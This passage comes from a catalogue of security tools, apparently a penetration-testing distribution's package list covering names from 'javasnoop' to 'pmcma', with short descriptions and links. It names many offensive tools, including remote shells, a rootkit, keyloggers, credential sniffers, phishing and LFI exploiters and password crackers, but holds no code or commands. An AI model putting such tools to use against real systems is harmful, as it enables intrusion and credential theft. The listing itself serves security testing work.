1.1__ A tool that lets you intercept methods, alter data and otherwise hack Java applications running on your computer https://code.google.com/p/javasnoop/ * __jboss-autopwn 1.3bc2d29__ A JBoss script for obtaining remote shell access. https://github.com/SpiderLabs/jboss-autopwn * __jbrofuzz 2.5__ Web application protocol fuzzer that emerged from the needs of penetration testing. http://sourceforge.net/projects/jbrofuzz/ * __jbrute 0.99__ Open Source Security tool to audit hashed passwords. http://sourceforge.net/projects/jbrute/ * __jd-gui 0.3.5__ A standalone graphical utility that displays Java source codes of .class files http://java.decompiler.free.fr/?q=jdgui * __jhead 2.97__ EXIF JPEG info parser and thumbnail remover http://www.sentex.net/~mwandel/jhead/ * __jigsaw 1.3__ A simple ruby script for enumerating information about a company's employees. It is useful for Social Engineering or Email Phishing. https://github.com/pentestgeek/jigsaw * __jnetmap 0.5.3__ A network monitor of sorts http://www.rakudave.ch/jnetmap/?file=introduction * __john 1.7.9__ John The Ripper - A fast password cracker (jumbo included) http://www.openwall.com/john/ * __johnny 20120424__ GUI for John the Ripper. http://openwall.info/wiki/john/johnny * __jomplug 0.1__ This php script fingerprints a given Joomla system and then uses Packet Storm's archive to check for bugs related to the installed components. http://packetstormsecurity.com/files/121390/Janissaries-Joomla-Fingerprint-Tool.html * __joomlascan 1.2__ Joomla scanner scans for known vulnerable remote file inclusion paths and files. http://packetstormsecurity.com/files/62126/joomlascan.2.py.txt.html * __joomscan 2012.03.10__ Detects file inclusion, sql injection, command execution vulnerabilities of a target Joomla! web site. http://joomscan.sourceforge.net/ * __js-beautify 1.4.2__ This little beautifier will reformat and reindent bookmarklets, ugly JavaScript, unpack scripts packed by Dean Edward?s popular packer, as well as deobfuscate scripts processed by javascriptobfuscator.com. https://github.com/einars/js-beautify * __jsql__ 0.5 A lightweight application used to find database information from a distant server. https://code.google.com/p/jsql-injection/ * __junkie 1338.baa4524__ A modular packet sniffer and analyzer. https://github.com/securactive/junkie * __jwscan 6.b0306f0__ Scanner for Jar to EXE wrapper like Launch4j, Exe4j, JSmooth, Jar2Exe. https://github.com/katjahahn/JWScan * __jynx2 2.0__ An expansion of the original Jynx LD_PRELOAD rootkit http://www.blackhatlibrary.net/Jynx2 * __kalibrate-rtl 11.aae11c8__ Fork of http://thre.at/kalibrate/ for use with rtl-sdr devices. https://github.com/steve-m/kalibrate-rtl * __katsnoop 0.1__ Utility that sniffs HTTP Basic Authentication information and prints the base64 decoded form. http://packetstormsecurity.com/files/52514/katsnoop.tbz2.html * __kautilya 0.5.0__ Pwnage with Human Interface Devices using Teensy++2.0 and Teensy 3.0 devices http://code.google.com/p/kautilya * __keimpx 0.2__ Tool to verify the usefulness of credentials across a network over SMB. http://code.google.com/p/keimpx/ * __khc 0.2__ A small tool designed to recover hashed known_hosts fiels back to their plain-text equivalents. http://packetstormsecurity.com/files/87003/Known-Host-Cracker.2.html * __killerbee 85__ Framework and tools for exploiting ZigBee and IEEE 802.15.4 networks. https://code.google.com/p/killerbee/ * __kippo 0.9__ A medium interaction SSH honeypot designed to log brute force attacks and most importantly, the entire shell interaction by the attacker. https://github.com/desaster/kippo * __kismet 2013_03_R1b 802.11__ layer2 wireless network detector, sniffer, and intrusion detection system http://www.kismetwireless.net/ * __kismet-earth 0.1__ Various scripts to convert kismet logs to kml file to be used in Google Earth. http:// * __kismet2earth 1.0__ A set of utilities that convert from Kismet logs to Google Earth .kml format http://code.google.com/p/kismet2earth/ * __klogger 1.0__ A keystroke logger for the NT-series of Windows. http://ntsecurity.nu/toolbox/klogger/ * __kolkata 3.0__ A web application fingerprinting engine written in Perl that combines cryptography with IDS evasion. http://www.blackhatlibrary.net/Kolkata * __kraken 32.368a837__ A project to encrypt A5/1 GSM signaling using a Time/Memory Tradeoff Attack. http://opensource.srlabs.de/projects/a51-decrypt * __laf 12.7a456b3__ Login Area Finder: scans host/s for login panels. https://github.com/takeshixx/laf * __lanmap2 124.4f8afed__ Passive network mapping tool http://github.com/rflynn/lanmap2 * __lans 1.0__ A Multithreaded asynchronous packet parsing/injecting arp spoofer. https://github.com/DanMcInerney/LANs.py * __latd 1.31__ A LAT terminal daemon for Linux and BSD. http://sourceforge.net/projects/linux-decnet/files/latd/1.31/ * __laudanum 1.0__ A collection of injectable files, designed to be used in a pentest when SQL injection flaws are found and are in multiple languages for different environments. http://laudanum.inguardians.com/# * __lbd 20130719__ Load Balancing detector http://ge.mine.nu/code/lbd * __lbmap 145.93e6b71__ Proof of concept scripts for advanced web application fingerprinting, presented at OWASP AppSecAsia 2012. https://github.com/wireghoul/lbmap * __ldapenum 0.1__ Enumerate domain controllers using LDAP. https://gobag.googlecode.com/svn-history/r2/trunk/ldap/ldapenum/ * __leo 4.11__ Literate programmer's editor, outliner, and project manager http://webpages.charter.net/edreamleo/front.html * __leroy-jenkins 0.r3.bdc3965__ A python tool that will allow remote execution of commands on a Jenkins server and its nodes. https://github.com/captainhooligan/Leroy-Jenkins * __levye 85.419e817__ A brute force tool which is support sshkey, vnckey, rdp, openvpn. https://github.com/galkan/levye * __lfi-autopwn 3.0__ A Perl script to try to gain code execution on a remote server via LFI http://www.blackhatlibrary.net/Lfi_autopwn.pl * __lfi-exploiter 1.1__ This perl script leverages /proc/self/environ to attempt getting code execution out of a local file inclusion vulnerability.. http://packetstormsecurity.com/files/124332/LFI-Exploiter.1.html * __lfi-fuzzploit 1.1__ A simple tool to help in the fuzzing for, finding, and exploiting of local file inclusion vulnerabilities in Linux-based PHP applications. http://packetstormsecurity.com/files/106912/LFI-Fuzzploit-Tool.1.html * __lfi-scanner 4.0__ This is a simple perl script that enumerates local file inclusion attempts when given a specific target. http://packetstormsecurity.com/files/102848/LFI-Scanner.0.html * __lfi-sploiter 1.0__ This tool helps you exploit LFI (Local File Inclusion) vulnerabilities. Post discovery, simply pass the affected URL and vulnerable parameter to this tool. You can also use this tool to scan a URL for LFI vulnerabilities. http://packetstormsecurity.com/files/96056/Simple-Local-File-Inclusion-Exploiter.0.html * __lfimap 1.4.8__ This script is used to take the highest beneficts of the local file include vulnerability in a webserver. https://code.google.com/p/lfimap/ * __lft 3.72__ A layer four traceroute implementing numerous other features. http://pwhois.org/lft/ * __libdisasm 0.23__ A disassembler library. http://bastard.sourceforge.net/libdisasm.html * __libpst 0.6.63__ Outlook .pst file converter http://www.five-ten-sg.com/libpst/ * __liffy 63.238ce6d__ A Local File Inclusion Exploitation tool. https://github.com/rotlogix/liffy * __linenum 18.b4c2541__ Scripted Local Linux Enumeration & Privilege Escalation Checks https://github.com/rebootuser/LinEnum * __linux-exploit-suggester 32.9db2f5a__ A Perl script that tries to suggest exploits based OS version number. https://github.com/PenturaLabs/Linux_Exploit_Suggester * __list-urls 0.1__ Extracts links from webpage http://www.whoppix.net * __littleblackbox 0.1.3__ Penetration testing tool, search in a collection of thousands of private SSL keys extracted from various embedded devices. http://code.google.com/p/littleblackbox/wiki/FAQ * __lodowep 1.2.1__ Lodowep is a tool for analyzing password strength of accounts on a Lotus Domino webserver system. http://www.cqure.net/wp/lodowep/ * __logkeys 0.1.1a__ Simple keylogger supporting also USB keyboards. http://logkeys.googlecode.com/ * __loki 0.2.7___ Python based framework implementing many packet generation and attack modules for Layer 2 and 3 protocols http://c0decafe.de/loki.html * __lorcon 2.0.0.20091101__ Generic library for injecting 802.11 frames http://802.11ninja.net/ * __lotophagi 0.1__ a relatively compact Perl script designed to scan remote hosts for default (or common) Lotus NSF and BOX databases. http://packetstormsecurity.com/files/55250/lotophagi.rar.html * __lsrtunnel 0.2__ lsrtunnel spoofs connections using source routed packets. http://www.synacklabs.net/projects/lsrtunnel/ * __luksipc 0.01__ A tool to convert unencrypted block devices to encrypted LUKS devices in-place. http://www.johannes-bauer.com/linux/luksipc * __lynis 1.6.4__ An auditing tool for Unix (specialists). http://www.rootkit.nl/projects/lynis.html * __mac-robber 1.02__ A digital investigation tool that collects data from allocated files in a mounted file system. http://www.sleuthkit.org/mac-robber/download.php * __macchanger 1.6.0__ A small utility to change your NIC's MAC address http://ftp.gnu.org/gnu/macchanger * __maclookup 0.3__ Lookup MAC addresses in the IEEE MA-L/OUI public listing. https://github.com/paraxor/maclookup * __magicrescue 1.1.9__ Find and recover deleted files on block devices http://freshmeat.net/projects/magicrescue/ * __magictree 1.3__ A penetration tester productivity tool designed to allow easy and straightforward data consolidation, querying, external command execution and report generation http://www.gremwell.com * __make-pdf 0.1.5__ This tool will embed javascript inside a PDF document. http://blog.didierstevens.com/programs/pdf-tools/ * __makepasswd 1.10_9__ Generates true random passwords with the emphasis on security over pronounceability (Debian version) http://packages.qa.debian.org/m/makepasswd.html * __malheur 0.5.4__ A tool for the automatic analyze of malware behavior. http://www.mlsec.org/malheur/ * __maligno 1.2__ An open source penetration testing tool written in python, that serves Metasploit payloads. It generates shellcode with msfvenom and transmits it over HTTP or HTTPS. http://www.encripto.no/tools/ * __malmon 0.3__ Hosting exploit/backdoor detection daemon. It's written in python, and uses inotify (pyinotify) to monitor file system activity. It checks files smaller then some size, compares their md5sum and hex signatures against DBs with known exploits/backdoor. http://sourceforge.net/projects/malmon/ * __maltego 3.5.3__ An open source intelligence and forensics application, enabling to easily gather information about DNS, domains, IP addresses, websites, persons, etc. http://www.paterva.com/web5 * __maltrieve 148.4ad4045__ Originated as a fork of mwcrawler. It retrieves malware directly from the sources as listed at a number of sites. https://github.com/technoskald/maltrieve * __malware-check-tool 1.2__ Python script that detects malicious files via checking md5 hashes from an offline set or via the virustotal site. It has http proxy support and an update feature. http://packetstormsecurity.com/files/93518/Malware-Check-Tool.2.html * __malwareanalyser 3.3__ A freeware tool to perform static and dynamic analysis on malware. http://malwareanalyser.blogspot.de/2011/10/malware-analyser.html * __malwaredetect 0.1__ Submits a file's SHA1 sum to VirusTotal to determine whether it is a known piece of malware http://www.virustotal.com * __malwasm 0.2__ Offline debugger for malware's reverse engineering. https://code.google.com/p/malwasm/ marc4dasm 6.f11860f This python-based tool is a disassembler for the Atmel MARC4 (a 4 bit Harvard micro). https://github.com/ApertureLabsLtd/marc4dasm * __maskprocessor 0.71__ A High-Performance word generator with a per-position configurable charset. http://hashcat.net/wiki/doku.php?id=maskprocessor * __masscan 391.a60cc70__ TCP port scanner, spews SYN packets asynchronously, scanning entire Internet in under 5 minutes. https://github.com/robertdavidgraham/masscan * __mat 0.5__ Metadata Anonymisation Toolkit composed of a GUI application, a CLI application and a library. https://mat.boum.org/ * __matahari 0.1.30__ A reverse HTTP shell to execute commands on remote machines behind firewalls. http://matahari.sourceforge.net * __mausezahn 0.40__ A free fast traffic generator written in C which allows you to send nearly every possible and impossible packet. http://www.perihel.at/sec/mz/ * __mbenum 1.5.0__ Queries the master browser for whatever information it has registered. http://www.cqure.net/wp/mbenum/ * __mboxgrep 0.7.9__ Mboxgrep is a small, non-interactive utility that scans mail folders for messages matching regular expressions. It does matching against basic and extended POSIX regular expressions, and reads and writes a variety of mailbox formats. http://mboxgrep.sourceforge.net * __md5deep 4.3__ Advanced checksum hashing tool http://md5deep.sourceforge.net * __mdbtools 0.7.1__ Utilities for viewing data and exporting schema from Microsoft Access Database files http://sourceforge.net/projects/mdbtools/ * __mdcrack 1.2__ MD4/MD5/NTLM1 hash cracker http://c3rb3r.openwall.net/mdcrack/ * __mdk3 6__ WLAN penetration tool http://homepages.tu-darmstadt.de/~p_larbig/wlan/ * __mdns-scan 0.5__ Scan mDNS/DNS-SD published services on the local network. * __medusa 2.1.1__ A speedy, massively parallel, modular, login brute-forcer for network. http://www.foofus.net/jmk/medusa/medusa.html * __melkor 1.0__ An ELF fuzzer that mutates the existing data in an ELF sample given to create orcs (malformed ELFs), however, it does not change values randomly (dumb fuzzing), instead, it fuzzes certain metadata with semi-valid values through the use of fuzzing rules (knowledge base). http://packetstormsecurity.com/files/127924/Melkor-ELF-Fuzzer.0.html * __memdump 1.01__ Dumps system memory to stdout, skipping over holes in memory maps. http://www.porcupine.org/forensics/tct.html * __memfetch 0.05b__ dumps any userspace process memory without affecting its execution http://lcamtuf.coredump.cx/ * __metacoretex 0.8.0__ MetaCoretex is an entirely JAVA vulnerability scanning framework for databases. http://metacoretex.sourceforge.net/ * __metagoofil 1.4b__ An information gathering tool designed for extracting metadata of public documents http://www.edge-security.com/metagoofil.php * __metasploit 29270.738fc78__ An open source platform that supports vulnerability research, exploit development and the creation of custom security tools representing the largest collection of quality-assured exploits. http://www.metasploit.com * __metoscan 05__ Tool for scanning the HTTP methods supported by a webserver. It works by testing a URL and checking the responses for the different requests. http://www.open-labs.org/ * __mfcuk 0.3.8__ MIFARE Classic Universal toolKit http://code.google.com/p/mfcuk/ * __mfoc 0.10.7__ Mifare Classic Offline Cracker http://code.google.com/p/mfoc/ * __mfsniffer 0.1__ A python script for capturing unencrypted TSO login credentials. http://packetstormsecurity.com/files/120802/MF-Sniffer-TN3270-Password-Grabber.html * __mibble 2.9.3__ Mibble is an open-source SNMP MIB parser (or SMI parser) written in Java. It can be used to read SNMP MIB files as well as simple ASN.1 files. http://www.mibble.org/ * __middler 1.0__ A Man in the Middle tool to demonstrate protocol middling attacks. http://code.google.com/p/middler/ * __minimysqlator 0.5__ A multi-platform application used to audit web sites in order to discover and exploit SQL injection vulnerabilities. http://www.scrt.ch/en/attack/downloads/mini-mysqlat0r * __miranda-upnp 1.3__ A Python-based Universal Plug-N-Play client application designed to discover, query and interact with UPNP devices http://code.google.com/p/miranda-upnp/ * __miredo 1.2.6__ Teredo client and server. http://www.remlab.net/miredo/ * __missidentify 1.0__ A program to find Win32 applications http://missidentify.sourceforge.net/ * __missionplanner 1.2.55__ A GroundControl Station for Ardupilot. https://code.google.com/p/ardupilot-mega/wiki/Mission * __mitmap 0.1__ Shell Script for launching a Fake AP with karma functionality and launches ettercap for packet capture and traffic manipulation. http://www.darkoperator.com/tools-and-scripts/ * __mitmer 22.b01c7fe__ A man-in-the-middle and phishing attack tool that steals the victim's credentials of some web services like Facebook. https://github.com/husam212/MITMer * __mitmf 169.83b4a93__ A Framework for Man-In-The-Middle attacks written in Python. https://github.com/byt3bl33d3r/MITMf * __mitmproxy 0.10.1__ SSL-capable man-in-the-middle HTTP proxy http://mitmproxy.org/ * __mkbrutus 1.0.2__ Password bruteforcer for MikroTik devices or boxes running RouterOS. http://mkbrutusproject.github.io/MKBRUTUS/ * __mobiusft 0.5.21__ An open-source forensic framework written in Python/GTK that manages cases and case items, providing an abstract interface for developing extensions. http://savannah.nongnu.org/projects/mobiusft * __modscan 0.1__ A new tool designed to map a SCADA MODBUS TCP based network. https://code.google.com/p/modscan/ * __moloch 0.9.2__ An open source large scale IPv4 full PCAP capturing, indexing and database system. https://github.com/aol/moloch * __monocle 1.0__ A local network host discovery tool. In passive mode, it will listen for ARP request and reply packets. In active mode, it will send ARP requests to the specific IP range. The results are a list of IP and MAC addresses present on the local network. http://packetstormsecurity.com/files/99823/Monocle-Host-Discovery-Tool.0.html * __morxbrute 1.01__ A customizable HTTP dictionary-based password cracking tool written in Perl http://www.morxploit.com/morxbrute/ * __morxcrack 1.2__ A cracking tool written in Perl to perform a dictionary-based attack on various hashing algorithm and CMS salted-passwords. http://www.morxploit.com/morxcrack/ * __mp3nema 0.4__ A tool aimed at analyzing and capturing data that is hidden between frames in an MP3 file or stream, otherwise noted as "out of band" data. http://packetstormsecurity.com/files/76432/MP3nema-Forensic-Analysis-Tool.html * __mptcp 1.9.0__ A tool for manipulation of raw packets that allows a large number of options. http://packetstormsecurity.com/files/119132/Mptcp-Packet-Manipulator.9.0.html * __mptcp-abuse 6.b0eeb27__ A collection of tools and resources to explore MPTCP on your network. Initially released at Black Hat USA 2014. https://github.com/Neohapsis/mptcp-abuse * __ms-sys 2.4.0__ A tool to write Win9x-.. master boot records (mbr) under linux - RTM! http://ms-sys.sourceforge.net/ * __mssqlscan 0.8.4__ A small multi-threaded tool that scans for Microsoft SQL Servers. http://www.cqure.net/wp/mssqlscan/ * __msvpwn 0.1.r23.g328921b__ Bypass Windows' authentication via binary patching. https://bitbucket.org/mrabault/msvpwn * __mtr 0.85__ Combines the functionality of traceroute and ping into one tool (CLI version) http://www.bitwizard.nl/mtr/ * __multiinjector 0.3__ Automatic SQL injection utility using a lsit of URI addresses to test parameter manipulation. http://chaptersinwebsecurity.blogspot.de/2008/11/multiinjector-v03-released.html * __multimac 1.0.3__ Multiple MACs on an adapter http://sourceforge.net/projects/multimac/ * __multitun 43.9804513__ Tunnel arbitrary traffic through an innocuous WebSocket. https://github.com/covertcodes/multitun * __mutator 51.164132d__ This project aims to be a wordlist mutator with hormones, which means that some mutations will be applied to the result of the ones that have been already done, resulting in something like: corporation -> C0rp0r4t10n_2012 https://bitbucket.org/alone/mutator/ * __mysql2sqlite 1.dd87f4__ Converts a mysqldump file into a Sqlite 3 compatible file https://gist.github.com/esperlu/943776 * __nacker 23.b67bb39__ A tool to circumvent 802.1x Network Access Control on a wired LAN. https://github.com/carmaa/nacker * __nbnspoof 1.0__ NBNSpoof - NetBIOS Name Service Spoofer http://www.mcgrewsecurity.com/tools/nbnspoof/ * __nbtenum 3.3__ A utility for Windows that can be used to enumerate NetBIOS information from one host or a range of hosts. http://reedarvin.thearvins.com/ * __nbtool 2.bf90c76__ Some tools for NetBIOS and DNS investigation, attacks, and communication. http://wiki.skullsecurity.org/Nbtool * __nbtscan 1.5.1__ NBTscan is a program for scanning IP networks for NetBIOS name information. http://www.inetcat.net/software/nbtscan.html * __ncpfs 2.2.6__ Allows you to mount volumes of NetWare servers under Linux. http://www.novell.com/ * __ncrack 0.4a__ A high-speed network authentication cracking tool http://nmap.org/ncrack/ * __nemesis 1.4__ command-line network packet crafting and injection utility http://nemesis.sourceforge.net/ * __netactview 0.6.2__ A graphical network connections viewer for Linux similar in functionality with Netstat http://netactview.sourceforge.net/index.html * __netbios-share-scanner 1.0__ This tool could be used to check windows workstations and servers if they have accessible shared resources. http://www.secpoint.com/netbios-share-scanner.html * __netcommander 1.3__ An easy-to-use arp spoofing tool. https://github.com/evilsocket/netcommander * __netcon 0.1__ A network connection establishment and management script. http://www.paramecium.org/~leendert/ * __netdiscover 0.3__ An active/passive address reconnaissance tool, mainly developed for those wireless networks without dhcp server, when you are wardriving. It can be also used on hub/switched networks. http://nixgeneration.com/~jaime/netdiscover/ * __netmap 0.1.3__ Can be used to make a graphical representation of the surounding network. http://netmap.sourceforge.net * __netmask 2.3.12__ Helps determine network masks http://packages.qa.debian.org/n/netmask.html * __netreconn 1.76__ A collection of network scan/recon tools that are relatively small compared to their larger cousins. http://packetstormsecurity.com/files/86076/NetReconn-Scanning-Tool-Collection.76.html * __netscan 1.0__ Tcp/Udp/Tor port scanner with: synpacket, connect TCP/UDP and socks5 (tor connection). http://packetstormsecurity.com/files/125569/Netscan-Port-Scanner.0.html * __netsed 1.2__ Small and handful utility design to alter the contents of packets forwarded thru network in real time. http://silicone.homelinux.org/projects/netsed/ * __netsniff-ng 0.5.8__ A high performance Linux network sniffer for packet inspection. http://netsniff-ng.org/ * __netzob 0.4.1__ An open source tool for reverse engineering, traffic generation and fuzzing of communication protocols. http://www.netzob.org/ * __nfcutils 0.3.2__ Provides a simple 'lsnfc' command that list tags which are in your NFC device field http://code.google.com/p/nfc-tools * __nfex 2.5__ A tool for extracting files from the network in real-time or post-capture from an offline tcpdump pcap savefile. It is based off of the code-base from the apparently defunct project tcpxtract. https://code.google.com/p/nfex/ * __nfspy 1.0__ A Python library for automating the falsification of NFS credentials when mounting an NFS share. https://github.com/bonsaiviking/NfSpy * __nfsshell 19980519__ Userland NFS command tool. http://www.paramecium.org/~leendert/ * __ngrep 1.45__ A grep-like utility that allows you to search for network packets on an interface. http://ngrep.sourceforge.net/ * __nield 0.5.1__ A tool to receive notifications from kernel through netlink socket, and generate logs related to interfaces, neighbor cache(ARP,NDP), IP address(IPv4,IPv6), routing, FIB rules, traffic control. http://nield.sourceforge.net/ * __nikto 2.1.5__ A web server scanner which performs comprehensive tests against web servers for multiple items http://www.cirt.net/nikto2 * __nimbostratus 54.c7c206f__ Tools for fingerprintinging and exploiting Amazon cloud infrastructures. https://github.com/andresriancho/nimbostratus * __nipper 0.11.7__ Network Infrastructure Parser https://www.titania-security.com/ * __nishang 0.4.0__ Using PowerShell for Penetration Testing. https://code.google.com/p/nishang/ * __nkiller2 2.0__ A TCP exhaustion/stressing tool. http://sock-raw.org/projects.html * __nmap 6.47__ Utility for network discovery and security auditing http://nmap.org/ * __nmbscan 1.2.6__ Tool to scan the shares of a SMB/NetBIOS network, using the NMB/SMB/NetBIOS protocols. http://nmbscan.gbarbier.org/ * __nomorexor 0.1__ Tool to help guess a files 256 byte XOR key by using frequency analysis https://github.com/hiddenillusion/NoMoreXOR * __notspikefile 0.1__ A Linux based file format fuzzing tool http://packetstormsecurity.com/files/39627/notSPIKEfile.tgz.html * __nsdtool 0.1__ A netgear switch discovery tool. It contains some extra features like bruteoforce and setting a new password. http://www.curesec.com/en/publications/tools.html * __nsec3walker 20101223__ Enumerates domain names using DNSSEC http://dnscurve.org/nsec3walker.html * __ntds-decode 0.1__ This application dumps LM and NTLM hashes from active accounts stored in an Active Directory database. http://packetstormsecurity.com/files/121543/NTDS-Hash-Decoder.b.html * __o-saft 513.6bcc35b__ A tool to show informations about SSL certificate and tests the SSL connection according given list of ciphers and various SSL configurations. https://www.owasp.org/index.php/O-Saft * __oat 1.3.1__ A toolkit that could be used to audit security within Oracle database servers. http://www.cqure.net/wp/test/ * __obexstress 0.1__ Script for testing remote OBEX service for some potential vulnerabilities. http://bluetooth-pentest.narod.ru/ * __obfsproxy 0.2.12__ A pluggable transport proxy written in Python. https://pypi.python.org/pypi/obfsproxy * __oclhashcat 1.30__ Worlds fastest WPA cracker with dictionary mutation engine. http://hashcat.net/oclhashcat/ * __ocs 0.2__ Compact mass scanner for Cisco routers with default telnet/enable passwords. http://packetstormsecurity.com/files/119462/OCS-Cisco-Scanner.2.html * __ohrwurm 0.1__ A small and simple RTP fuzzer. http://mazzoo.de/ * __ollydbg 201g__ A 32-bit assembler-level analysing debugger http://www.ollydbg.de * __onesixtyone 0.7__ An SNMP scanner that sends multiple SNMP requests to multiple IP addresses http://labs.portcullis.co.uk/application/onesixtyone/ * __onionshare 439.027d774__ Securely and anonymously share a file of any size. https://github.com/micahflee/onionshare/ * __openstego 0.6.1__ A tool implemented in Java for generic steganography, with support for password-based encryption of the data. http://www.openstego.info/ * __opensvp 64.56b2b8f__ A security tool implementing "attacks" to be able to the resistance of firewall to protocol level attack. https://github.com/regit/opensvp * __openvas-cli 1.3.1__ The OpenVAS Command-Line Interface http://www.openvas.org/ * __openvas-libraries 7.0.6__ The OpenVAS libraries http://www.openvas.org/ * __openvas-manager 5.0.7__ A layer between the OpenVAS Scanner and various client applications http://www.openvas.org/ * __openvas-scanner 4.0.5__ The OpenVAS scanning Daemon http://www.openvas.org/ * __ophcrack 3.6.0__ A free Windows password cracker based on rainbow tables http://ophcrack.sourceforge.net * __orakelcrackert 1.00__ This tool can crack passwords which are encrypted using Oracle's latest SHA1 based password protection algorithm. http://freeworld.thc.org/thc-orakelcrackert11g/ * __origami 1.2.7__ Aims at providing a scripting tool to generate and analyze malicious PDF files. http://code.google.com/p/origami-pdf * __oscanner 1.0.6__ An Oracle assessment framework developed in Java. http://www.cqure.net/wp/oscanner/ * __ostinato 0.5.1__ An open-source, cross-platform packet/traffic generator and analyzer with a friendly GUI. It aims to be "Wireshark in Reverse" and thus become complementary to Wireshark. http://code.google.com/p/ostinato/ * __osueta 65.90323e2__ A simple Python script to exploit the OpenSSH User Enumeration Timing Attack. https://github.com/c0r3dump3d/osueta * __owabf 1.3__ Outlook Web Access bruteforcer tool. http://netsec.rs/70/tools.html * __owasp-bywaf 26.e730d1b__ A web application penetration testing framework (WAPTF). https://github.com/depasonico/OWASP-ByWaf * __owtf 1016.fef357e__ The Offensive (Web) Testing Framework. https://www.owasp.org/index.php/OWASP_OWTF * __p0f 3.08b__ Purely passive TCP/IP traffic fingerprinting tool. http://lcamtuf.coredump.cx/p0f3/ * __pack 0.0.4__ Password Analysis and Cracking Kit http://thesprawl.org/projects/pack/ * __packerid 1.4__ Script which uses a PEiD database to identify which packer (if any) is being used by a binary. http://handlers.sans.org/jclausing/ * __packet-o-matic 351__ A real time packet processor. Reads the packet from an input module, match the packet using rules and connection tracking information and then send it to a target module. http://www.packet-o-matic.org/ * __packeth 1.7.2__ A Linux GUI packet generator tool for ethernet. http://packeth.sourceforge.net/ * __packit 1.0__ A network auditing tool. Its value is derived from its ability to customize, inject, monitor, and manipulate IP traffic. http://packit.sourceforge.net/ * __pacumen 1.92a0884__ Packet Acumen - Analyse encrypted network traffic and more (side-channel attacks). https://github.com/bniemczyk/pacumen * __padbuster 0.3.3__ Automated script for performing Padding Oracle attacks. http://www.gdssecurity.com/l/t.php * __paketto 1.10__ Advanced TCP/IP Toolkit. http://www.doxpara.com/paketto * __panoptic 178.73b2b4c__ A tool that automates the process of search and retrieval of content for common log and config files through LFI vulnerability. https://github.com/lightos/Panoptic * __paros 3.2.13__ Java-based HTTP/HTTPS proxy for assessing web app vulnerabilities. Supports editing/viewing HTTP messages on-the-fly, spiders, client certificates, proxy-chaining, intelligent scanning for XSS and SQLi, etc. http://www.parosproxy.org * __parsero 56.fc5f7ec__ A robots.txt audit tool. https://github.com/behindthefirewalls/Parsero * __pasco 20040505_1__ Examines the contents of Internet Explorer's cache files for forensic purposes http://www.jonesdykstra.com/ * __passcracking 20131214__ A little python script for sending hashes to passcracking.com and milw0rm http://github.com/jensp/passcracking * __passe-partout 0.1__ Tool to extract RSA and DSA private keys from any process linked with OpenSSL. The target memory is scanned to lookup specific OpenSSL patterns. http://www.hsc.fr/ressources/outils/passe-partout/index.html.en * __passivedns 1.1.3__ A network sniffer that logs all DNS server replies for use in a passive DNS setup. https://github.com/gamelinux/passivedns * __pastenum 0.4.1__ Search Pastebins for content, fork from nullthreat corelan pastenum2 http://github.com/shadowbq/pastenum * __patator 80.5a140c1__ A multi-purpose bruteforcer. https://github.com/lanjelot/patator * __pathod 0.11.1__ Crafted malice for tormenting HTTP clients and servers. http://pathod.net/ * __pblind 1.0__ Little utility to help exploiting blind sql injection vulnerabilities. http://www.edge-security.com/pblind.php * __pcapsipdump 0.2__ A tool for dumping SIP sessions (+RTP traffic, if available) to disk in a fashion similar to 'tcpdump -w' (format is exactly the same), but one file per sip session (even if there is thousands of concurrect SIP sessions). http://pcapsipdump.sourceforge.net/ * __pcredz 0.9__ A tool that extracts credit card numbers, NTLM(DCE-RPC, HTTP, SQL, LDAP, etc), Kerberos (AS-REQ Pre-Auth etype 23), HTTP Basic, SNMP, POP, SMTP, FTP, IMAP, and more from a pcap file or from a live interface. https://github.com/lgandx/PCredz * __pdf-parser 0.4.2__ Parses a PDF document to identify the fundamental elements used in the analyzed file http://blog.didierstevens.com/programs/pdf-tools/ * __pdfbook-analyzer 2__ Utility for facebook memory forensics. http://sourceforge.net/projects/pdfbook/ * __pdfcrack 0.12__ Password recovery tool for PDF-files. http://pdfcrack.sourceforge.net/ * __pdfid 0.1.2__ scan a file to look for certain PDF keywords http://blog.didierstevens.com/programs/pdf-tools/ * __pdfresurrect 0.12__ A tool aimed at analyzing PDF documents. http://packetstormsecurity.com/files/118459/PDFResurrect-PDF-Analyzer.12.html * __pdgmail 1.0__ A password dictionary attack tool that targets windows authentication via the SMB protocol http://www.jeffbryner.com/code/pdgmail * __peach 3.0.202__ A SmartFuzzer that is capable of performing both generation and mutation based fuzzing http://peachfuzzer.com/ * __peda 51.327db44__ Python Exploit Development Assistance for GDB. https://github.com/longld/peda * __peepdf 0.3__ A Python tool to explore PDF files in order to find out if the file can be harmful or not http://eternal-todo.com/tools/peepdf-pdf-analysis-tool * __pentbox 1.8__ A security suite that packs security and stability testing oriented tools for networks and systems. http://www.pentbox.net * __perl-image-exiftool 9.76__ Reader and rewriter of EXIF informations that supports raw files http://search.cpan.org/perldoc?exiftool * __perl-tftp 1.0b3__ TFTP - TFTP Client class for perl http://search.cpan.org/~gsm/TFTP/TFTP.pm * __pev 0.60__ Command line based tool for PE32/PE32+ file analysis http://pev.sourceforge.net/ * __pextractor 0.18b__ A forensics tool that can extract all files from an executable file created by a joiner or similar. http://packetstormsecurity.com/files/62977/PExtractor_v0.18b_binary_and_src.rar.html * __pgdbf 94.baa1d95__ Convert XBase / FoxPro databases to PostgreSQL https://github.com/kstrauser/pgdbf * __phoss 0.1.13__ Sniffer designed to find HTTP, FTP, LDAP, Telnet, IMAP4, VNC and POP3 logins. http://www.phenoelit.org/fr/tools.html * __php-mt-seed 3.2__ PHP mt_rand() seed cracker http://www.openwall.com/php_mt_seed/ * __php-rfi-payload-decoder 30.bd42caa__ Decode and analyze RFI payloads developed in PHP. https://github.com/bwall/PHP-RFI-Payload-Decoder * __php-vulnerability-hunter 1.4.0.20__ An whitebox fuzz testing tool capable of detected several classes of vulnerabilities in PHP web applications. https://phpvulnhunter.codeplex.com/ * __phpstress 5.f987a7e__ A PHP denial of service / stress test for Web Servers running PHP-FPM or PHP-CGI. https://github.com/nightlionsecurity/phpstress * __phrasendrescher 1.2.2__ A modular and multi processing pass phrase cracking tool http://www.leidecker.info/projects/phrasendrescher/ * __pipal 1.1__ A password analyser http://www.digininja.org/projects/pipal.php * __pirana 0.3.1__ Exploitation framework that tests the security of a email content filter. http://www.guay-leroux.com/projects.html * __plcscan 0.1__ This is a tool written in Python that will scan for PLC devices over s7comm or modbus protocols. http://packetstormsecurity.com/files/119726/PLC-Device-Scanner.html * __plecost 2__ Wordpress finger printer tool search and retrieve information about the plugins versions installed in Wordpress systems. http://code.google.com/p/plecost/ * __plown 13.ccf998c__ A security scanner for Plone CMS. https://github.com/unweb/plown * __pmcma 1.00__ Automated exploitation of invalid memory writes (being them the 